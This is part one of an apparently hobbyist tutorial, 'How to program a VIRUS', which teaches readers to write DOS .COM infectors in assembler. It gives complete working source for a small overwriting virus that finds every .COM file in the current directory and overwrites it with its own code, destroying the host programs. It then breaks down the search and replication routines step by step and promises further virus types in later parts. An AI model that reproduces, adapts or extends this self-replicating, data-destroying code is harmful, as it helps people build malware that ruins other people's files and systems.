How to program a VIRUS: Part 1

For those who don't know anything about it, I'll start from the beginning.

What is a virus?

A virus is a program, most often (not always) written in assembler, which has the ability to reproduce itself once executed.

In general, a virus is contained into a program to facilitate its activation and therefore its reproduction. It is designed to go unnoticed during its contamination and replication phase.
A virus must have at least 2 parts:

• one allowing it to search for files to contaminate.
• one allowing it to reproduce itself.

We can then add other routines (parts or sub-parts) such as a destructive load, a triggering module, ...

Of course, viruses have been around for long time and were originally designed to infect .COM files dating back to the CP/M era.

Today, viruses attacking Windows .EXE files or macro viruses and other Worms viruses... are much more complex in their writing.

However, some mechanisms remain the same.

To start with, we will study some simple .COM infectors. Try to find a book on assembler in parallel to this course. You will also need an assembler. I recommend TASM.

Simple COM infector virus

It is better to start with a very small virus which will be easy to understand and not too dangerous in case of escape...

This is a simple non-memory resident COM infector with non-destructive 80X86 code.

Among COM infectors there are overlapping viruses, companion viruses and parasitic viruses, but we'll see that later.

Let's see already how a .COM program works.

At the DOS prompt, when you type the name of a .COM program, DOS looks for a program with that name and the .COM extension. If it finds it, it loads it into RAM and executes it. If not, it looks for an .EXE with the same name, then for a .BAT file.
COM programs are the simplest of all CPU programs. Their segment format is predefined in DOS. A COM program can only use one segment, i.e. 64KB. The COM file is loaded into the segment at offset 100h, while DOS creates a program segment prefix from address 0 to 0FFh.
This is where our virus comes in.

1. the overlay virus

It's simple and it's crap, because once a program is contaminated, it's destroyed because it's partially overwritten, hence the name overwriting. So there's no way to hide such a virus. It works in the following way:

• the virus is executed.
• It starts its execution in the segment allocated by DOS at offset 100h.
• It searches for all files with "*.COM" mask in the current directory.
• It opens each file found and writes its code at the beginning.
• It returns control to DOS.

The infected program is then screwed, and when you run it, it is actually the virus code that is executed.

Here is the source of such a virus:

A virus of about 50 bytes that rewrites all the COM's files of a directory. 
 
.model small 
.code 
 
FNOM EQU 9EH                           ;Search function, result. 
 
               org 100H 
 
START: 
               mov ah,4EH              ;Search for COM files (SF) 
               mov dx,OFFSET COM_FILE 
               int 21H 
 
SEARCH: 
               jc DONE 
               mov ax,3D01H            ;Opens the file found. 
               mov dx,FNOM 
               int 21H 
 
               xchg ax,bx              ;Writes the virus to the file. 
               mov ax,40H 
               mov cl,42               ;Size of the virus. 
               mov dx,100H             ;Location of the virus. 
               int 21H 
 
               mov ah,3EH 
               int 21H                 ;Close the file. 
 
               mov ah,4FH 
               int 21H                 ;Search for a new COM file. 
               jmp SEARCH 
DONE: 
               ret                     ;Return control to DOS. 
COM_FILE Db '*.COM',0                  ;String for COM search. 
 
END START

Voilà. I hope you will understand something. Now let's take a closer look at the search routine.

1.1 Search function

The DOS keeps the information of the files in 2 areas of the disk (FAT). The directory contains a field of 32 bytes which contains the name, date, size, extension and attributes of the files.The FAT is thus a structure of the disk. Each disk contains 2 FATs. The FAT and the Root directory are always located in the same place on all disks.

DOS makes it easy for us to find and open the file we want, by calling the right DOS interrupt and placing the correct values in the CPU registers.

For example,

mov dx,OFFSET FNOM 
xor al,al 
mov ah,3DH 
int 21H

This routine opens a file whose name is stored in FNOM.

It is the same for groups of files or directories. It is enough to declare a directory or a name with the syntax:

Db 'Chemin\nom_de_fichier.ext'

Of course, the character * and ? are wildcards as in the DOS prompt.

We are going to look for a first .COM file then, if we find one, we look for a second one ...
We will use for that a first search function, then a second one for the following files.

The first routine looks like this:

CH_UN: 
    mov dx,OFFSET FICHCOM    ;which points to the string '*.COM'. 
    mov ah,4EH               ;First search function 
    int 21H                  ;calls DOS. 
    jc PASFICH               ;if no file found 
 
FIND:                        ;Jump here if file found 
 
FICHCOM Db '*.COM',0         ;ASCII string

If the first search gives a result, the second search is called. It is much simpler because the parameters have been fixed before.

    mov ax,4FH 
    int 21h 
    jc PASFICH 
FIND2:

1.2 Replication function

We have seen how the virus finds its host program. Now, its code must open the host and then write its code into the host program, overwriting it since it is an overlay virus.

To open the host, the virus uses the 3Dh function of the 21h interrupt. The access rights are specified in the al register which takes the value 1 (write only). DX:DS points to the file found whose name is stored in FNOM at address 9EH.

The code is therefore as follows:

    mov ax,3D01H 
    mov dx OFFSET FNOM 
    int 21H

DOS then returns an identification number of the file in ax, which must be placed in bx for all manipulations, so we use the instruction "mov bx,ax".

Then, the virus calls the 40H function of int 21h to copy its code. It is ds:dx that points to the place where the data will be written. Here the position is ds:100h since the code is written at the beginning of the file (overlay). Here cx carries the number of bytes to be written, and dx points to the data to be written. we get the following code:

    mov bx,ax 
    mov dx,100h 
    mov cx,44 
    mov ah,40h 
    int 21h

You will notice that this code is very simple, both in its structure and in its execution. Obviously, it is not very powerful, but it is only 45 bytes long, which is very little. The main defect of this type of virus (recovery) is that it destroys everything it infects and therefore can not go unnoticed for long.

If you run this virus, you just have to run the programs in the same directory to know if they are infected, then you just have to delete them and replace them with a backup to get back a healthy directory.

The next part will be devoted to simple companion viruses infecting .COM

-=Shin=-